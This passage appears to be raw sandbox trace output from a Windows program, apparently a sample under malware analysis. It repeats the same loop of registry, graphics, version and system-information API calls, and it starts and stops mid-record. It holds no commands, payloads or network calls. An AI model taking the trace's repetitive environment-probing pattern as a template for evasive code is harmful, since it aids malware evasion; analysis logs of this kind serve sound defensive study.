(TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.080] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.080] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x3c0401cd [0088.080] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x3a0401d0 [0088.080] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040e28 [0088.080] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040e29 [0088.080] CombineRgn (hrgnDst=0x1040e28, hrgnSrc1=0x3c0401cd, hrgnSrc2=0x3a0401d0, iMode=1) returned 1 [0088.080] CombineRgn (hrgnDst=0x1040e29, hrgnSrc1=0x3c0401cd, hrgnSrc2=0x3a0401d0, iMode=4) returned 2 [0088.080] CreateSolidBrush (color=0xff) returned 0x2100e27 [0088.080] CreateSolidBrush (color=0xff0000) returned 0x1100e2a [0088.080] DeleteObject (ho=0x1100e2a) returned 1 [0088.080] DeleteObject (ho=0x3a0401d0) returned 1 [0088.080] DeleteObject (ho=0x3c0401cd) returned 1 [0088.080] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.080] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.080] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.080] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.080] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.080] BeginPath (hdc=0x0) returned 0 [0088.080] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.080] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.080] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.080] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.080] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.080] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.080] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.080] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.080] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x3b0401d0 [0088.080] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x3d0401cd [0088.080] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040e2b [0088.081] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040e2c [0088.081] CombineRgn (hrgnDst=0x1040e2b, hrgnSrc1=0x3b0401d0, hrgnSrc2=0x3d0401cd, iMode=1) returned 1 [0088.081] CombineRgn (hrgnDst=0x1040e2c, hrgnSrc1=0x3b0401d0, hrgnSrc2=0x3d0401cd, iMode=4) returned 2 [0088.081] CreateSolidBrush (color=0xff) returned 0x2100e2a [0088.081] CreateSolidBrush (color=0xff0000) returned 0x1100e2d [0088.081] DeleteObject (ho=0x1100e2d) returned 1 [0088.081] DeleteObject (ho=0x3d0401cd) returned 1 [0088.081] DeleteObject (ho=0x3b0401d0) returned 1 [0088.081] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.081] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.081] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.081] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.081] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.081] BeginPath (hdc=0x0) returned 0 [0088.081] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.081] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.081] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.081] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.081] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.081] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.081] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.081] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.081] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x3e0401cd [0088.081] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x3c0401d0 [0088.081] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040e2e [0088.081] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040e2f [0088.081] CombineRgn (hrgnDst=0x1040e2e, hrgnSrc1=0x3e0401cd, hrgnSrc2=0x3c0401d0, iMode=1) returned 1 [0088.081] CombineRgn (hrgnDst=0x1040e2f, hrgnSrc1=0x3e0401cd, hrgnSrc2=0x3c0401d0, iMode=4) returned 2 [0088.081] CreateSolidBrush (color=0xff) returned 0x2100e2d [0088.081] CreateSolidBrush (color=0xff0000) returned 0x1100e30 [0088.081] DeleteObject (ho=0x1100e30) returned 1 [0088.081] DeleteObject (ho=0x3c0401d0) returned 1 [0088.081] DeleteObject (ho=0x3e0401cd) returned 1 [0088.081] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.081] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.081] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.082] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.082] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.082] BeginPath (hdc=0x0) returned 0 [0088.082] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.082] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.082] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.082] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.082] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.082] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.082] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.082] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.082] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x3d0401d0 [0088.082] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x3f0401cd [0088.082] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040e31 [0088.082] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040e32 [0088.082] CombineRgn (hrgnDst=0x1040e31, hrgnSrc1=0x3d0401d0, hrgnSrc2=0x3f0401cd, iMode=1) returned 1 [0088.082] CombineRgn (hrgnDst=0x1040e32, hrgnSrc1=0x3d0401d0, hrgnSrc2=0x3f0401cd, iMode=4) returned 2 [0088.082] CreateSolidBrush (color=0xff) returned 0x2100e30 [0088.082] CreateSolidBrush (color=0xff0000) returned 0x1100e33 [0088.082] DeleteObject (ho=0x1100e33) returned 1 [0088.082] DeleteObject (ho=0x3f0401cd) returned 1 [0088.082] DeleteObject (ho=0x3d0401d0) returned 1 [0088.082] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.082] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.082] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.082] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.082] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.082] BeginPath (hdc=0x0) returned 0 [0088.082] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.082] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.082] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.082] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.082] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.082] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.082] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.082] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.083] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x400401cd [0088.083] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x3e0401d0 [0088.083] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040e34 [0088.083] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040e35 [0088.083] CombineRgn (hrgnDst=0x1040e34, hrgnSrc1=0x400401cd, hrgnSrc2=0x3e0401d0, iMode=1) returned 1 [0088.083] CombineRgn (hrgnDst=0x1040e35, hrgnSrc1=0x400401cd, hrgnSrc2=0x3e0401d0, iMode=4) returned 2 [0088.083] CreateSolidBrush (color=0xff) returned 0x2100e33 [0088.083] CreateSolidBrush (color=0xff0000) returned 0x1100e36 [0088.083] DeleteObject (ho=0x1100e36) returned 1 [0088.083] DeleteObject (ho=0x3e0401d0) returned 1 [0088.083] DeleteObject (ho=0x400401cd) returned 1 [0088.083] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.083] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.083] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.083] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.083] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.083] BeginPath (hdc=0x0) returned 0 [0088.083] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.083] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.083] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.083] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.083] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.083] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.083] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.083] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.083] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x3f0401d0 [0088.083] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x410401cd [0088.083] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040e37 [0088.083] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040e38 [0088.083] CombineRgn (hrgnDst=0x1040e37, hrgnSrc1=0x3f0401d0, hrgnSrc2=0x410401cd, iMode=1) returned 1 [0088.083] CombineRgn (hrgnDst=0x1040e38, hrgnSrc1=0x3f0401d0, hrgnSrc2=0x410401cd, iMode=4) returned 2 [0088.083] CreateSolidBrush (color=0xff) returned 0x2100e36 [0088.083] CreateSolidBrush (color=0xff0000) returned 0x1100e39 [0088.083] DeleteObject (ho=0x1100e39) returned 1 [0088.083] DeleteObject (ho=0x410401cd) returned 1 [0088.084] DeleteObject (ho=0x3f0401d0) returned 1 [0088.084] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.084] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.084] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.084] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.084] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.084] BeginPath (hdc=0x0) returned 0 [0088.084] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.084] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.084] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.084] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.084] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.084] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.084] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.084] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.084] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x420401cd [0088.084] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x400401d0 [0088.084] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040e3a [0088.084] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040e3b [0088.084] CombineRgn (hrgnDst=0x1040e3a, hrgnSrc1=0x420401cd, hrgnSrc2=0x400401d0, iMode=1) returned 1 [0088.084] CombineRgn (hrgnDst=0x1040e3b, hrgnSrc1=0x420401cd, hrgnSrc2=0x400401d0, iMode=4) returned 2 [0088.084] CreateSolidBrush (color=0xff) returned 0x2100e39 [0088.084] CreateSolidBrush (color=0xff0000) returned 0x1100e3c [0088.084] DeleteObject (ho=0x1100e3c) returned 1 [0088.084] DeleteObject (ho=0x400401d0) returned 1 [0088.084] DeleteObject (ho=0x420401cd) returned 1 [0088.084] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.084] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.084] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.084] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.084] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.084] BeginPath (hdc=0x0) returned 0 [0088.084] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.084] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.084] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.084] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.084] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.084] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.085] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.085] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.085] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x410401d0 [0088.085] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x430401cd [0088.085] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040e3d [0088.085] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040e3e [0088.085] CombineRgn (hrgnDst=0x1040e3d, hrgnSrc1=0x410401d0, hrgnSrc2=0x430401cd, iMode=1) returned 1 [0088.085] CombineRgn (hrgnDst=0x1040e3e, hrgnSrc1=0x410401d0, hrgnSrc2=0x430401cd, iMode=4) returned 2 [0088.085] CreateSolidBrush (color=0xff) returned 0x2100e3c [0088.085] CreateSolidBrush (color=0xff0000) returned 0x1100e3f [0088.085] DeleteObject (ho=0x1100e3f) returned 1 [0088.085] DeleteObject (ho=0x430401cd) returned 1 [0088.085] DeleteObject (ho=0x410401d0) returned 1 [0088.085] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.085] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.085] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.085] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.085] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.085] BeginPath (hdc=0x0) returned 0 [0088.085] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.085] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.085] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.085] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.085] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.085] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.085] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.085] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.085] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x440401cd [0088.085] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x420401d0 [0088.085] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040e40 [0088.085] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040e41 [0088.086] CombineRgn (hrgnDst=0x1040e40, hrgnSrc1=0x440401cd, hrgnSrc2=0x420401d0, iMode=1) returned 1 [0088.086] CombineRgn (hrgnDst=0x1040e41, hrgnSrc1=0x440401cd, hrgnSrc2=0x420401d0, iMode=4) returned 2 [0088.086] CreateSolidBrush (color=0xff) returned 0x2100e3f [0088.086] CreateSolidBrush (color=0xff0000) returned 0x1100e42 [0088.086] DeleteObject (ho=0x1100e42) returned 1 [0088.086] DeleteObject (ho=0x420401d0) returned 1 [0088.086] DeleteObject (ho=0x440401cd) returned 1 [0088.086] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.086] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.086] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.086] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.086] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.086] BeginPath (hdc=0x0) returned 0 [0088.086] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.086] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.086] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.086] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.086] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.086] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.086] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.086] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.086] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x430401d0 [0088.086] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x450401cd [0088.086] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040e43 [0088.086] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040e44 [0088.086] CombineRgn (hrgnDst=0x1040e43, hrgnSrc1=0x430401d0, hrgnSrc2=0x450401cd, iMode=1) returned 1 [0088.086] CombineRgn (hrgnDst=0x1040e44, hrgnSrc1=0x430401d0, hrgnSrc2=0x450401cd, iMode=4) returned 2 [0088.086] CreateSolidBrush (color=0xff) returned 0x2100e42 [0088.086] CreateSolidBrush 